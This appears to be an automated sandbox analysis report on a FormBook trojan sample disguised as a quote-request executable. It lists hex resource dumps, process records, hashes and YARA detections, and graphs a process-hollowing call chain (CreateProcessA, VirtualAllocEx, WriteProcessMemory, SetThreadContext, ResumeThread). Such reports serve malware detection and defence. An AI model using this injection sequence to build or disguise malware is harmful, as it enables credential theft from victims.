                  2022-08-08 20:21:09 UTC49INData Raw: 00 30 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff f7 77 77 77 77 77 77 7f f7 ff ff ff ff ff ff 7f f7 ff ff ff ff ff ff 7f f7 ff ff ff ff ff ff 7f f7 ff ff ff ff ff ff 7f f7 ff ff ff ff ff ff 7f f7 ff ff ff ff ff ff 7f f7 ff ff ff ff ff ff 7f f7 ff ff ff ff ff ff 7f f7 77 77 77 77 77 77 7f f7 77 77 77 77 77 77 7f f7 77 77 77 77 77 77 7f ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: 0( wwwwwwwwwwwwwwwwwwwwwwww
                  2022-08-08 20:21:09 UTC50INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00
                  Data Ascii:
                  2022-08-08 20:21:09 UTC52INData Raw: 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                  Data Ascii: ( @
                  2022-08-08 20:21:09 UTC53INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  2022-08-08 20:21:09 UTC54INData Raw: 01 01 01 01 01 01 01 03 03 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  2022-08-08 20:21:09 UTC58INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:22:21:07
                  Start date:08/08/2022
                  Path:C:\Users\user\Desktop\RFQ- 7075-T6.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\RFQ- 7075-T6.exe"
                  Imagebase:0x210000
                  File size:7680 bytes
                  MD5 hash:D9761200032232025041EA4E1F7D0AE2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237260939.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237294660.0000000003619000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:1
                  Start time:22:21:09
                  Start date:08/08/2022
                  Path:C:\Users\user\Desktop\RFQ- 7075-T6.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\RFQ- 7075-T6.exe
                  Imagebase:0x2f0000
                  File size:7680 bytes
                  MD5 hash:D9761200032232025041EA4E1F7D0AE2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.230933027.00000000003C1000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:4
                  Start time:22:21:12
                  Start date:08/08/2022
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 172
                  Imagebase:0xb40000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Reset < >

                    Execution Graph

                    Execution Coverage:19.3%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:59.3%
                    Total number of Nodes:81
                    Total number of Limit Nodes:0
                    execution_graph 5747 23c5df0 5748 23c5e0a 5747->5748 5752 23c5e58 5748->5752 5781 23c5e48 5748->5781 5749 23c5e28 5753 23c5e8b 5752->5753 5810 23c70ac 5753->5810 5814 23c70b8 5753->5814 5754 23c6672 5755 23c677f 5754->5755 5775 23c7548 SetThreadContext 5754->5775 5776 23c7541 SetThreadContext 5754->5776 5769 23c79f8 VirtualAllocEx 5755->5769 5770 23c79f0 VirtualAllocEx 5755->5770 5756 23c69cb 5757 23c6a4a 5756->5757 5773 23c79f8 VirtualAllocEx 5756->5773 5774 23c79f0 VirtualAllocEx 5756->5774 5777 23c7799 WriteProcessMemory 5757->5777 5778 23c77a0 WriteProcessMemory 5757->5778 5758 23c6d87 5765 23c7799 WriteProcessMemory 5758->5765 5766 23c77a0 WriteProcessMemory 5758->5766 5759 23c6dd9 5761 23c6ee9 5759->5761 5763 23c7548 SetThreadContext 5759->5763 5764 23c7541 SetThreadContext 5759->5764 5760 23c6ac7 5760->5758 5771 23c7799 WriteProcessMemory 5760->5771 5772 23c77a0 WriteProcessMemory 5760->5772 5767 23c7b18 ResumeThread 5761->5767 5768 23c7b10 ResumeThread 5761->5768 5762 23c6fa9 5762->5749 5763->5761 5764->5761 5765->5759 5766->5759 5767->5762 5768->5762 5769->5756 5770->5756 5771->5760 5772->5760 5773->5757 5774->5757 5775->5755 5776->5755 5777->5760 5778->5760 5782 23c5e58 5781->5782 5798 23c70ac CreateProcessA 5782->5798 5799 23c70b8 CreateProcessA 5782->5799 5783 23c6672 5784 23c677f 5783->5784 5818 23c7541 5783->5818 5822 23c7548 5783->5822 5826 23c79f0 5784->5826 5830 23c79f8 5784->5830 5785 23c6a4a 5834 23c7799 5785->5834 5838 23c77a0 5785->5838 5786 23c69cb 5786->5785 5792 23c79f8 VirtualAllocEx 5786->5792 5793 23c79f0 VirtualAllocEx 5786->5793 5787 23c6d87 5802 23c7799 WriteProcessMemory 5787->5802 5803 23c77a0 WriteProcessMemory 5787->5803 5788 23c6dd9 5790 23c6ee9 5788->5790 5800 23c7548 SetThreadContext 5788->5800 5801 23c7541 SetThreadContext 5788->5801 5789 23c6ac7 5789->5787 5808 23c7799 WriteProcessMemory 5789->5808 5809 23c77a0 WriteProcessMemory 5789->5809 5842 23c7b10 5790->5842 5846 23c7b18 5790->5846 5791 23c6fa9 5791->5749 5792->5785 5793->5785 5798->5783 5799->5783 5800->5790 5801->5790 5802->5788 5803->5788 5808->5789 5809->5789 5811 23c713f CreateProcessA 5810->5811 5813 23c7394 5811->5813 5813->5813 5815 23c713f CreateProcessA 5814->5815 5817 23c7394 5815->5817 5819 23c7591 SetThreadContext 5818->5819 5821 23c7609 5819->5821 5821->5784 5823 23c7591 SetThreadContext 5822->5823 5825 23c7609 5823->5825 5825->5784 5827 23c79f8 VirtualAllocEx 5826->5827 5829 23c7ab4 5827->5829 5829->5786 5831 23c7a3c VirtualAllocEx 5830->5831 5833 23c7ab4 5831->5833 5833->5786 5835 23c77a0 WriteProcessMemory 5834->5835 5837 23c7885 5835->5837 5837->5789 5839 23c77ec WriteProcessMemory 5838->5839 5841 23c7885 5839->5841 5841->5789 5843 23c7b5c ResumeThread 5842->5843 5845 23c7ba8 5843->5845 5845->5791 5847 23c7b5c ResumeThread 5846->5847 5849 23c7ba8 5847->5849 5849->5791
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e11e94ef7f45b8cb4d08bed4808cb290465a9c0ea9b77efbaa6692dede2fcfbb
                    • Instruction ID: 52c30a8113de45459dbef176e18ce3b7e5676f7569fd3e2cb582bccfd06648a5
                    • Opcode Fuzzy Hash: e11e94ef7f45b8cb4d08bed4808cb290465a9c0ea9b77efbaa6692dede2fcfbb
                    • Instruction Fuzzy Hash: CAA2E074A412288FEB64EF64CD95BEDB7B2AB89304F1080E9D40DA7350DB359E86DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02945e11514a6c6631e408181af85612165c15e6e0444dff496f576b8019ea39
                    • Instruction ID: 0b794c102818dd399580d70c95813bbc06c67420bfe7888f8e202073ef46ee11
                    • Opcode Fuzzy Hash: 02945e11514a6c6631e408181af85612165c15e6e0444dff496f576b8019ea39
                    • Instruction Fuzzy Hash: 2892D174A412288FEB64EF65CC95BEDB7B2AB8A304F1080E9D40DA7350DB359E85DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 761 23c48a0-23c48cc 762 23c48ce 761->762 763 23c48d3-23c4938 761->763 762->763 765 23c493e-23c4976 763->765 766 23c4a57-23c4a71 763->766 767 23c497d-23c49b6 765->767 768 23c4978 765->768 770 23c4b6c-23c4b8f 766->770 771 23c4a77-23c4aa3 766->771 777 23c49bd-23c49cb 767->777 778 23c49b8 767->778 768->767 779 23c4de1-23c4ded 770->779 773 23c4aaa-23c4ad1 771->773 774 23c4aa5 771->774 789 23c4ad8-23c4ae6 773->789 790 23c4ad3 773->790 774->773 781 23c49cd 777->781 782 23c49d2-23c4a0b 777->782 778->777 783 23c4b94-23c4bb7 779->783 784 23c4df3-23c4dfd 779->784 781->782 799 23c4a0d 782->799 800 23c4a12-23c4a20 782->800 793 23c4bbe-23c4bc9 783->793 794 23c4bb9 783->794 785 23c4dff-23c4e0c 784->785 791 23c4aed-23c4b20 789->791 792 23c4ae8 789->792 790->789 808 23c4b27-23c4b35 791->808 809 23c4b22 791->809 792->791 796 23c4bcb 793->796 797 23c4bd0-23c4bd5 793->797 794->793 796->797 801 23c4bdc-23c4c14 797->801 802 23c4bd7 797->802 799->800 803 23c4a27-23c4a51 800->803 804 23c4a22 800->804 816 23c4c1b-23c4c28 801->816 817 23c4c16 801->817 802->801 803->766 804->803 811 23c4b3c-23c4b66 808->811 812 23c4b37 808->812 809->808 811->770 812->811 853 23c4c2d call 23c4e0f 816->853 854 23c4c2d call 23c4e20 816->854 817->816 820 23c4c33-23c4c8b 824 23c4c8d 820->824 825 23c4c92-23c4cbe 820->825 824->825 827 23c4cc5-23c4cd0 825->827 828 23c4cc0 825->828 829 23c4cd7-23c4cdc 827->829 830 23c4cd2 827->830 828->827 831 23c4cde 829->831 832 23c4ce3-23c4cf0 829->832 830->829 831->832 855 23c4cf5 call 23c4e0f 832->855 856 23c4cf5 call 23c4e20 832->856 834 23c4cfb-23c4d3e call 23c4800 838 23c4dd4-23c4dda 834->838 839 23c4d44-23c4d67 834->839 838->779 840 23c4ddc 838->840 842 23c4d6e-23c4d79 839->842 843 23c4d69 839->843 840->779 844 23c4d7b 842->844 845 23c4d80-23c4d85 842->845 843->842 844->845 846 23c4d8c-23c4dc4 845->846 847 23c4d87 845->847 851 23c4dcb-23c4dd2 846->851 852 23c4dc6 846->852 847->846 851->785 852->851 853->820 854->820 855->834 856->834
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4a6e15554bec221db424c6f46e49c030f1f99130d9580d9f7df837e5e75886cc
                    • Instruction ID: 8e25aae6e689cae34246df5d70fa4b2980c37a430794ab048b40b2faa33c9930
                    • Opcode Fuzzy Hash: 4a6e15554bec221db424c6f46e49c030f1f99130d9580d9f7df837e5e75886cc
                    • Instruction Fuzzy Hash: DFF13B74E002198FDB58DFA5C891BEDB7B2AB88314F60C06DD909A7345DB346D85CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 34 23c70ac-23c7151 36 23c719a-23c71c2 34->36 37 23c7153-23c716a 34->37 40 23c7208-23c725e 36->40 41 23c71c4-23c71d8 36->41 37->36 42 23c716c-23c7171 37->42 49 23c72a4-23c7392 CreateProcessA 40->49 50 23c7260-23c7274 40->50 41->40 51 23c71da-23c71df 41->51 43 23c7194-23c7197 42->43 44 23c7173-23c717d 42->44 43->36 46 23c717f 44->46 47 23c7181-23c7190 44->47 46->47 47->47 52 23c7192 47->52 70 23c739b-23c7480 49->70 71 23c7394-23c739a 49->71 50->49 59 23c7276-23c727b 50->59 53 23c71e1-23c71eb 51->53 54 23c7202-23c7205 51->54 52->43 56 23c71ed 53->56 57 23c71ef-23c71fe 53->57 54->40 56->57 57->57 60 23c7200 57->60 61 23c727d-23c7287 59->61 62 23c729e-23c72a1 59->62 60->54 64 23c7289 61->64 65 23c728b-23c729a 61->65 62->49 64->65 65->65 66 23c729c 65->66 66->62 83 23c7490-23c7494 70->83 84 23c7482-23c7486 70->84 71->70 86 23c74a4-23c74a8 83->86 87 23c7496-23c749a 83->87 84->83 85 23c7488 84->85 85->83 89 23c74b8-23c74bc 86->89 90 23c74aa-23c74ae 86->90 87->86 88 23c749c 87->88 88->86 92 23c74be-23c74e7 89->92 93 23c74f2-23c74fd 89->93 90->89 91 23c74b0 90->91 91->89 92->93 96 23c74fe 93->96 96->96
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023C737F
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 69445afce1a9e3ad61917b74676ae6eb8a57a42839571316a5fb084e191ae1bb
                    • Instruction ID: 4abec873f7d30a83a1c58ab40f68567e41bada985101226303458e640eda85cf
                    • Opcode Fuzzy Hash: 69445afce1a9e3ad61917b74676ae6eb8a57a42839571316a5fb084e191ae1bb
                    • Instruction Fuzzy Hash: 10C13671D102698FDB20CFA4C841BEEBBB5BF09314F1095A9E859B7240DB749E89CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 98 23c70b8-23c7151 100 23c719a-23c71c2 98->100 101 23c7153-23c716a 98->101 104 23c7208-23c725e 100->104 105 23c71c4-23c71d8 100->105 101->100 106 23c716c-23c7171 101->106 113 23c72a4-23c7392 CreateProcessA 104->113 114 23c7260-23c7274 104->114 105->104 115 23c71da-23c71df 105->115 107 23c7194-23c7197 106->107 108 23c7173-23c717d 106->108 107->100 110 23c717f 108->110 111 23c7181-23c7190 108->111 110->111 111->111 116 23c7192 111->116 134 23c739b-23c7480 113->134 135 23c7394-23c739a 113->135 114->113 123 23c7276-23c727b 114->123 117 23c71e1-23c71eb 115->117 118 23c7202-23c7205 115->118 116->107 120 23c71ed 117->120 121 23c71ef-23c71fe 117->121 118->104 120->121 121->121 124 23c7200 121->124 125 23c727d-23c7287 123->125 126 23c729e-23c72a1 123->126 124->118 128 23c7289 125->128 129 23c728b-23c729a 125->129 126->113 128->129 129->129 130 23c729c 129->130 130->126 147 23c7490-23c7494 134->147 148 23c7482-23c7486 134->148 135->134 150 23c74a4-23c74a8 147->150 151 23c7496-23c749a 147->151 148->147 149 23c7488 148->149 149->147 153 23c74b8-23c74bc 150->153 154 23c74aa-23c74ae 150->154 151->150 152 23c749c 151->152 152->150 156 23c74be-23c74e7 153->156 157 23c74f2-23c74fd 153->157 154->153 155 23c74b0 154->155 155->153 156->157 160 23c74fe 157->160 160->160
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023C737F
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 8fcfe069182eb7f92f04a1c8a2eec25db84e799918cb27db5177780f00b9dc9e
                    • Instruction ID: 0701bd82ff050dc917e30ddd88f0f213019bcb664ae9e2d21f8b38275ab7adee
                    • Opcode Fuzzy Hash: 8fcfe069182eb7f92f04a1c8a2eec25db84e799918cb27db5177780f00b9dc9e
                    • Instruction Fuzzy Hash: CEC12671D102698FDB20CFA4C841BEEBBB5BF09314F1095A9E859B7240DB749E89CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 162 23c7799-23c780b 165 23c780d-23c781f 162->165 166 23c7822-23c7883 WriteProcessMemory 162->166 165->166 168 23c788c-23c78de 166->168 169 23c7885-23c788b 166->169 169->168
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023C7873
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: c551c4b5e609e48df8adc8f95a4fbc02b0736c862fa5c8df92906b0e5a017cd8
                    • Instruction ID: 459fa52a6bd84b6b3b84ef0bc01354d6b3d3f595790187b0ba675ce8d8d80449
                    • Opcode Fuzzy Hash: c551c4b5e609e48df8adc8f95a4fbc02b0736c862fa5c8df92906b0e5a017cd8
                    • Instruction Fuzzy Hash: A441BBB5D002589FCF00CFA9D984AEEFBF1BB09314F14902AE914B7210D738AA45CF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 174 23c77a0-23c780b 176 23c780d-23c781f 174->176 177 23c7822-23c7883 WriteProcessMemory 174->177 176->177 179 23c788c-23c78de 177->179 180 23c7885-23c788b 177->180 180->179
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023C7873
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 4e14bcc73c63471f1f0a7930c685a8ddc0a2fb478a2c98f88b0c1a040f1a9393
                    • Instruction ID: 821a13a648908e017e6bc169e7f262252537de27ccda0ad8fc5ce3b359857dd3
                    • Opcode Fuzzy Hash: 4e14bcc73c63471f1f0a7930c685a8ddc0a2fb478a2c98f88b0c1a040f1a9393
                    • Instruction Fuzzy Hash: 5641ACB5D012589FCF00CFA9D984AEEFBF5BB49314F14902AE915B7210D738AA45CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 185 23c79f0-23c7ab2 VirtualAllocEx 189 23c7abb-23c7b05 185->189 190 23c7ab4-23c7aba 185->190 190->189
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023C7AA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: c59268abd4cfbe1b0a9e76e24c5b156d5d446dbcc5870906835d1def7cfa5011
                    • Instruction ID: ed3978092b95dc357bd6cc8b416e503f9ac9d8b51d3e1c0953949754ec06d1b2
                    • Opcode Fuzzy Hash: c59268abd4cfbe1b0a9e76e24c5b156d5d446dbcc5870906835d1def7cfa5011
                    • Instruction Fuzzy Hash: 6741A8B9D002589FCF10CFA9D985ADEFBB5BB09324F10902AE814B7310D734A946CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 195 23c79f8-23c7ab2 VirtualAllocEx 198 23c7abb-23c7b05 195->198 199 23c7ab4-23c7aba 195->199 199->198
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023C7AA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: c92a846f281eee02fce7a46bf59a72b1ea8a78a72b670b1d14ff4d4cec2693ba
                    • Instruction ID: c76795bfb3e64c04f1d72e3be502ddc216f9cd143da7069f18128ddc23e5569e
                    • Opcode Fuzzy Hash: c92a846f281eee02fce7a46bf59a72b1ea8a78a72b670b1d14ff4d4cec2693ba
                    • Instruction Fuzzy Hash: 1531A8B8D002589FCF10CFA9D984ADEFBB5BB49324F10942AE815B7310D735A946CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 204 23c7541-23c75a8 206 23c75bf-23c7607 SetThreadContext 204->206 207 23c75aa-23c75bc 204->207 209 23c7609-23c760f 206->209 210 23c7610-23c765c 206->210 207->206 209->210
                    APIs
                    • SetThreadContext.KERNELBASE(?,?), ref: 023C75F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.232240283.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_23c0000_RFQ- 7075-T6.jbxd
                    Similarity
                    • API ID: ContextThread
                    • String ID:
                    • API String ID: 1591575202-0
                    • Opcode ID: ba11eef6dc5055c9c5d28a2aca80e39820a0a24496019f92528394089a044c89
                    • Instruction ID: 31dad92c08d5a022e9d1844f5d11ef5414a543a8bd89461ccf3a1f45f762a995
                    • Opcode Fuzzy Hash: ba11eef6dc5055c9c5d28a2aca80e39820a0a24496019f92528394089a044c89
                    • Instruction Fuzzy Hash: 6641ABB5D012589FCB14CFA9D984AEEFBB1AF49314F14802AE815B7640D738A989CF54
                    Uniqueness

                    Uniqueness Score: -1.00%

